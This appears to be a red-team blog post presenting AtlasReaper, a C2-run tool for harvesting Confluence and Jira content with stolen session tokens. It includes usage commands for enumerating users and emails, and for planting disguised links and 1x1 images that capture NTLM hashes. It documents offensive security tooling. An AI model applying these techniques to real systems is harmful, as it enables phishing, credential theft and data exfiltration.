Sowing Chaos and Reaping Rewards in Confluence and Jira

Introduction

Let me paint a picture for you. You’re on a red team operation, operating from your favorite C2, and have just landed on a user’s workstation. You decide to take a look at their DNS cache to get a list of internal resources the user has been browsing and as you look through the list, there are several that you recognize based on naming conventions. One in particular might be interesting: Atlassian. What do you do next? Do you immediately sleep your Beacon down to 0 and SOCKS proxy in browser traffic? No way. You have options!

TL;DR

I have created a new .NET tool named AtlasReaper that calls the Atlassian REST APIs for Confluence and Jira. It is designed to run in-memory from C2 agents, with the aim of minimizing the network overhead generated from a SOCKS proxy. This tool has several features, including listing spaces, pages, attachments, projects, issues (and comments), usernames, and emails, and has the ability to search by a provided keyword. I have also included some features for adding content to pages and issues.

https://github.com/werdhaihai/AtlasReaper

Why??

As red teamers, we are often asked to perform the relatively mundane task of triaging local and remote file systems or other information systems such as Confluence and Jira. This can be both time-consuming and tedious. Why do we do boring stuff, then? Because it’s usually fruitful! If you create a system and it accepts files or text, people will put their passwords or sensitive customer information posthaste. This is something adversaries use to their advantage.

There are other tools, like conf-thief and jecretz, that solve the problem of searching through Confluence and Jira, but I couldn’t find a tool that did both or a tool that had all of the features I wanted. My aim was to build a tool that could quickly interact with Confluence and Jira via C2. I also wanted to make use of the very “fun” Confluence Query Language and Jira Query Language with “fuzzy” searching. I needed the ability to view spaces, pages, and issues individually, dump everything at once to the console, or save the output to a file. I also felt there could be value in attaching files, commenting, and mentioning other users on pages and issues.

Overview of Confluence and Jira

A full explanation of all of the features of Confluence and Jira is outside the scope of this blog post; however, I wanted to briefly provide a breakdown of the structure of each of these applications.

Confluence is basically a wiki for companies. Confluence uses spaces to logically separate or group information. Spaces are often broken down by department (e.g. Finance, HR, IT, etc) and can contain pages. The latter is where users put text, tables, attachments, and so on. The breakdown in a tree structure looks something like this:

GLOBAL CORP CONFLUENCE INSTANCE
├───Finance (Space)
│   ├───2023 Annuals (Page)
│   └───SWIFT Account (Page)
├───HR (Space)
│   ├───Internal Systems (Page)
│   └───Training and Development (Page)
└───IT (Space)
    ├───Cloud Infrastructure (Page)
    ├───New-Hire Onboarding (Page)
    └───Software Licenses (Page)

Jira is an issue and project tracking software. Jira is broken down into projects, and projects are broken down further into issues. Issues can be used in various ways; for instance, I have seen them used as a way to track individual tasks, IT help tickets, and even findings and security issues discovered in past penetration test reports.😈

Jira breakdown:

GLOBAL CORP JIRA INSTANCE
├───Dev (Project)
│   ├───DEV30 - Convert All Codebases to COBOL (Issue)
│   └───DEV61 - Implement New Feature Request (Issue)
├───IT (Project)
│   ├───IT849 - Server Maintenance (Issue)
│   └───IT9999999 - Password Reset for David (Issue)
└───SEC (Project)
    ├───SEC105 - Security Incident Response (Issue)
    └───SEC99 - SQL Injection Everywhere! (Issue)

Introducing AtlasReaper

Atlassian is pushing users from on-premises to cloud versions of these services; as such, the tool is designed to work with cloud versions. The cloud versions of these applications use the same session token, named cloud.session.token . Oftentimes, Confluence and Jira will be accessible to anonymous users (“It’s secure! They’d have to be on the VPN to access it”). Try running the tool without the -c or — cookie flag. Otherwise, you’ll need to dump the session token from the user’s browser.

AtlasReaper includes two commands, confluence and jira:

.\AtlasReaper.exe

                                                   .@@@@
                                               @@@@@
                                            @@@@@   @@@@@@@
                                          @@@@@   @@@@@@@@@@@
                                         @@@@@  @@@@@@@@@@@@@@@
                                        @@@@,  @@@@        *@@@@
                                          @@@@ @@@  @@  @@@ .@@@
   _  _   _         ___                       @@@@@@@     @@@@@@
  /_\| |_| |__ _ __| _ \___ __ _ _ __  ___ _ _   @@   @@@@@@@@
 / _ \  _| / _` (_-<   / -_) _` | '_ \/ -_) '_|  @@   @@@@@@@@
/_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_|    @@@@@@@@   &@
                                |_|             @@@@@@@@@@  @@&
                                                @@@@@@@@@@@@@@@@@
                                               @@@@@@@@@@@@@@@@. @@
                                                  @werdhaihai

Available commands:

    confluence       - query confluence
    jira             - query jira

Confluence

The confluence command contains several subcommands.

.\AtlasReaper.exe confluence --help

AtlasReaper 1.0.0.0

  attach             Attach a file to a page

  embed              Embed a 1x1 pixel image to perform farming attacks

  download           Download Attachment

  link               Add link to page

  listattachments    List Attachments

  listpages          List pages

  listspaces         List spaces

  search             Search Confluence

  help               Display more information on a specific command.

  version            Display version information.

With listspaces, you may be able to find spaces with names you’d like to look at further.

.\AtlasReaper.exe confluence listspaces -u $url -c $token

Authenticated as: Eugene Krabs
    Space Name:        Finance
    Space Id:          793487
    Space Type:        global
    Space Status:      current
    
    Space Name:        IT
    Space Id:          793495
    Space Type:        global
    Space Status:      current
    
    Space Name:        Marketing
    Space Id:          798434
    Space Type:        global
    Space Status:      current

You can list all of the pages for a space of interest:

.\AtlasReaper.exe confluence listpages -s IT -u $url -c $token

Authenticated as: Eugene Krabs
 Page Title: Backup and Disaster Recovery Plan
 Updated   : 2023-11-07T19:03:27.305Z
 Page Id   : 79472045
 
 Page Title: IT Security Policy Review
 Updated   : 2023-09-12T10:45:18.207Z
 Page Id   : 72059478
 
 Page Title: IT Infrastructure Documentation
 Updated   : 2023-07-19T08:12:36.550Z
 Page Id   : 75208489
 
 Page Title: Password Policy
 Updated   : 2023-06-22T23:50:10.409Z
 Page Id   : 72938475
 
 Page Title: Secure Remote Access Configuration
 Updated   : 2023-04-03T16:29:45.932Z
 Page Id   : 74592470
 
 Page Title: Product requirements
 Updated   : 2023-02-28T13:57:59.811Z
 Page Id   : 72984234

Or, list all attachments for spaces:

.\AtlasReaper.exe confluence listattachments -u $url -c $token -s IT

Authenticated as: Eugene Krabs
 Attachment Title: Employee Handbook.docx 
 Attachment Id: att3194311 
 Attachment Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document Attachment Type Description: Microsoft Word Document 
 Attachment Size: 1 Mb 
 Download Link: /download/attachments/245246/User%20Guide.docx?version=2&modificationDate=1592239434574&cacheVersion=1&api=v2
 
 Attachment Title: Network Infrastructure Diagram.png 
 Attachment Id: att3194312 
 Attachment Type: image/png 
 Attachment Type Description: PNG Image 
 Attachment Size: 599 Kb 
 Download Link: /download/attachments/6455345/Network%20Infrastructure%20Diagram.png?version=1&modificationDate=1630202891538&cacheVersion=1&api=v2
 
 Attachment Title: IT Security Policy.pdf 
 Attachment Id: att3194313 
 Attachment Type: application/pdf 
 Attachment Type Description: PDF Document 
 Attachment Size: 2 Mb 
 Download Link: /download/attachments/254524/IT%20Security%20Policy.pdf?version=1&modificationDate=1627895249841&cacheVersion=1&api=v2

Any of these attachments can be downloaded using the attachment ID and the download command.

You can use the search command to search for a user-defined term to attempt to find secrets. The search verb will output “context”, which is a certain number of characters before and after the search match; however, if you would like to output the entire page’s contents, use the listpages command with the flag — page, followed by the page Id.

Jira

I won’t describe every jira subcommand, but similar to the confluence command, it contains several subcommands:

.\AtlasReaper.exe jira --help

AtlasReaper 1.0.0.0

  addcomment         Add a comment to an issue

  attach             Attach a file to an issue

  createissue        Create an issue

  download           Download attachment(s)

  listattachments    List Attachments

  listissues         List Issues

  listprojects       List Jira Projects

  listusers          List Atlassian users

  search             Search issues

  help               Display more information on a specific command.

  version            Display version information.

The commands listprojects and listissues function much like their Confluence listspaces and listpages counterparts. The jira command also has functionality for outputting usernames and email addresses for all Atlassian users.

.\AtlasReaper.exe jira listusers -u $url -c $token

Authenticated as: Eugene Krabs

User Name : Squidward Tentacles
User Id   : 17928342
Active    : True
User Email: s.tentacles@krustykrab.corp

User Name : Spongebob Squarepants
User Id   : 99809874
Active    : True
User Email: s.squarepants@krustykrab.corp

User Name : Eugene Krabs
User Id   : 21346634
Active    : True
User Email: e.krabs@krustykrab.corp

Attacks

This brings us to our final set of commands: the create commands. I mentioned that AtlasReaper has the ability to add content to pages in Confluence and create and comment on issues in Jira. Imagine now you have identified a user of interest. It could be nice to @ them and explain why they should visit a specific website or download and run a file. Now, let’s say you’ve compromised another server on the network. You could stand up a tool, such as SharpWebServer, with the hopes of capturing Net-NTLMv2 authentication. There are a few pieces of information we will need that can be obtained from AtlasReaper. Using information we have gathered in previous examples, we might be able to convince Spongebob to click our link.

Let’s break down the options:

• — at used to specify the user to mention (comma separated for multiple users)
• -m for the message to be added
• -p for the page we are adding our message to
• -l for the link we want to add, in this case a different server we’ve already compromised running our NTLM capture tool
• -t for the text for the link (can be used to “hide” our malicious link)

With all of this in place, we can fire off the command.

.\AtlasReaper.exe confluence link `
--at 99809874 `
-m "There's a page dedicated to 'Employee Recognition' where they showcase all the employees who have gone above and beyond in their work." `
-p 72938475 `
-l "http://jenkins.krustkrab.corp/?redir=https://krustykrab.atlassian.net/wiki/spaces/HR/pages/4728384/Employee+Recognition" `
-t "https://krustykrab.atlassian.net/wiki/spaces/HR/pages/4728384/Employee+Recognition"

Authenticated as: Eugene Krabs
Output of Password Policy after update.

<p /><p /><p><ac:link><ri:user ri:account-id="99809874" /></ac:link></p>There's a page dedicated to 'Employee Recognition' where they showcase all the employees who have gone above and beyond in their work.
<a href="http://jenkins.krustkrab.corp/?redir=https://krustykrab.atlassian.net/wiki/spaces/HR/pages/4728384/Employee+Recognition">?https://krustykrab.atlassian.net/wiki/spaces/HR/pages/4728384/Employee+Recognition</a>

You may have noticed the link to our Jenkins server has a URL redir parameter. I recently made a pull request to SharpWebServer to parse the incoming requests and issue a redirect to the user, based on the redir parameter.

Note: Any of the commands that create any content on pages do so in an appending fashion. No data will be deleted.

Updated Password Policy Page

Lo and behold…

SharpWebServer Capturing a Hash in Redir Mode

Yay, time to crack!

The World’s smallest image

Wouldn’t it be nice if we could get this hash in a less conspicuous way? There is one final command to discuss. The embed command has the ability to embed an image in a page. We have used this successfully on an operation in the past to capture a number of hashes. Simply use SharpWebServer to host a 1x1 pixel image, and have AtlasReaper append it to the Page of your choice. Good targets for this might be the pages for weekly standup meetings or any pages that look to have been recently updated (AtlasReaper supports a few filtering options you might use).

Conclusion

Both attackers and defenders will find AtlasReaper useful. I encourage you to dig around and see what goodies lie in Confluence and Jira. If you work somewhere that allows anonymous access to Confluence and Jira, I encourage you to make some noise about it.

This tool has not been widely tested, so while attempts at proper error-handling have been made, don’t yell at me if your Beacon dies. There are some additional features for both Confluence and Jira that are not covered by the tool, primarily because I haven’t seen them used or they aren’t as “interesting.” If you find that certain information or functionality is missing, I would be happy to hear about it. Pull requests are welcome!